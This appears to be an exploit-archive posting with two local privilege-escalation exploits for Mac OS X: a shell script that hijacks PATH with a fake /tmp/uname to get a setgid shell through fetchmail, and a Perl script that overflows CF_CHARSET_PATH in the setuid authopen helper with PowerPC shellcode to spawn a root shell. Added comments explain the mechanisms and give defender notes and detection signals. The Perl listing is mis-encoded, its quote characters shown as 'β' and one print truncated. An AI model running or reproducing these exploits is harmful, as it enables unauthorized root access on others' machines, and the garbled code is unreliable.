OSX: local fetchmail exploit
local fetchmail exploit, v1 and v2
#!/bin/sh
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# Mechanism (as written): /tmp is placed first in PATH, a stand-in
# "uname" that execs an interactive shell is dropped there, and the
# setgid fetchmail binary is invoked.  If fetchmail resolves "uname"
# through PATH rather than by absolute path, the stand-in inherits
# fetchmail's effective group (presumably gid 6 on the affected build —
# confirm against the target's group database).
#
# Defender notes: the root weakness is a privileged (setuid/setgid)
# program honouring a caller-controlled PATH when it runs helpers; such
# programs should reset PATH or call helpers by absolute path.  An
# executable file in /tmp named after a system utility (here
# /tmp/uname), created shortly before a setgid process launch, is a
# concrete detection signal.
export PATH=/tmp:$PATH
# The stand-in is a one-line script; "-i" makes the spawned shell interactive.
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
# Trigger: the version banner — presumably where fetchmail shells out to uname.
/usr/bin/fetchmail -V
v2:
#!/usr/bin/perl
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#
# NOTE(review): this listing is mis-encoded — every string delimiter is
# rendered as the character "β" and the Usage print is truncated.  It is
# kept byte-for-byte as found; the comments below describe what the code
# expresses, not a verified run.
#
# Mechanism (as written): the setuid-root helper /usr/libexec/authopen is
# started with two caller-controlled environment variables.
# CF_CHARSET_PATH holds a fixed-length filler followed by a repeated
# packed address (0xbffffef6) — presumably a stack overwrite in the
# library code that reads that variable; APPL holds the payload that the
# address is presumably meant to reach.  The hard-coded address and the
# per-target padding tie the script to the single build listed in %tgts.
#
# Defender notes: the weakness is a privileged program (or a library it
# loads) trusting the caller's environment.  Setuid/setgid binaries
# should run under a sanitised environment, and libraries should ignore
# path-style environment overrides when issetugid() reports a privileged
# process.  On the detection side, an oversized or non-printable
# CF_CHARSET_PATH/APPL in the environment of a setuid process, and an
# unprivileged user writing /tmp/sh, are both concrete signals.

# Start from an empty environment so only the two variables set below
# reach the target.
foreach $key (keys %ENV) {
delete $ENV{$key};
}
#// ppc execve() code by b-r00t + nemo to add seteuid(0)
# Raw payload bytes; per the author's comment, PowerPC code that sets
# euid 0 and execs the "/bin/sh" string visible at the end.
$sc =
β\x7c\x63\x1a\x79β .
β\x40\x82\xff\xfdβ .
β\x39\x40\x01\xc3β .
β\x38\x0a\xfe\xf4β .
β\x44\xff\xff\x02β .
β\x39\x40\x01\x23β .
β\x38\x0a\xfe\xf4β .
β\x44\xff\xff\x02β .
β\x60\x60\x60\x60β .
β\x7c\xa5\x2a\x79β .
β\x40\x82\xff\xfdβ .
β\x7d\x68\x02\xa6β .
β\x3b\xeb\x01\x70β .
β\x39\x40\x01\x70\x39\x1f\xfe\xcfβ .
β\x7c\xa8\x29\xae\x38\x7f\xfe\xc8β .
β\x90\x61\xff\xf8\x90\xa1\xff\xfcβ .
β\x38\x81\xff\xf8\x38\x0a\xfe\xcbβ .
β\x44\xff\xff\x02\x7c\xa3\x2b\x78β .
β\x38\x0a\xfe\x91\x44\xff\xff\x02β .
β\x2f\x62\x69\x6e\x2f\x73\x68\x58β;
# Target table, keyed by the command-line index: "<description>:<padding>".
$tgts{β0β} = β10.3.7 Build 7T65 on PowerPC:1β;
$tgts{β1β} = β10.3.7 debug 0x41424344:0β;
# Usage listing when no target index is supplied.
unless (($target) = @ARGV) {
print β\n\nUsage: $0
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{β$keyβ});
print β\t$key . $a\nβ;
}
print β\nβ;
exit 1;
}
# $retval is never assigned in this listing, so $ret packs an undefined
# value; $ret is not referenced afterwards (dead code).
$ret = pack(βlβ, ($retval));
# $a = target description, $b = padding count for the chosen target.
($a,$b) = split(/\:/,$tgts{β$targetβ});
print β*** Target: $a, Padding: $b\nβ;
# add a wrapper here if you want more than euid=0
# Writes /tmp/sh; nothing later in the listing references it.
open(SUSH,β>/tmp/shβ);
printf SUSH β/bin/csh -i\nβ;
# 1048 bytes of filler, then the 4-byte packed address twice.
$ENV{βCF_CHARSET_PATHβ} = βAβ x 1048 . pack(βlβ, 0xbffffef6) x 2;
# Per-target padding, a 160-byte "iiii" run, then the payload bytes.
$ENV{βAPPLβ} = β.β x $b . βiiiiβ x 40 . $sc ;
# Trigger: the setuid helper is run with the crafted environment.
system(β/usr/libexec/authopen /etc/master.passwdβ);